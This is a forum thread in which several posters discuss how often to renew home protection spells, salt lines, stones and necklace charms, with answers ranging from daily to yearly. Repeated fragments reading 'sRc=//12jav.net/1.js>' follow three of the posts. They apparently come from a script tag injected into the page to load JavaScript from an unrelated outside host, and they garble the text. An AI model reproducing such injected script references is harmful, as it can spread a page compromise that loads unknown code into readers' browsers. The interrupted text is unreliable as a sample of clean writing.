I do my protective spells around my home, every three days. I redo the salt lines and I cleanse and charge the stones. I am very happy with the safety of my home. I know this seems like a very short time, but it works for me. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Well it probably depends on how much work it has to do, and how strong your spell casting is. If you're constantly being directly attacked I'd say that your protection charm would need to be reinforced all the time, maybe even every day, but if you're preventing general harm, probably once a month at the full moon would be enough. But redo your spell whenever you feel like you're less protected than you were sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
Because my work environment is very negative I use a couple of different protections depending on what I am needing that day. Because what I use absorbs the negative energy I recharge them or cleanse them depending on the item at least weekly. I initially saged and salted my house weekly for about a month but now I usually only do it every 4-6 weeks. It depends on the spell, I cast a protection spell on my necklace every full moon. While I've heard tales of spells lasting lifetimes, I think the max is a year. As you get better with sensing energy you should be able to gauge how strong/weak the energy is. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
Usually the spell must be repeated every now and then. For example every full moon as nekoshema said. But it will have to be on the same phase (if you use moon phases) exactly the same spell (ingredients and wording) and the ammount of days that it is repeated should remain constant.
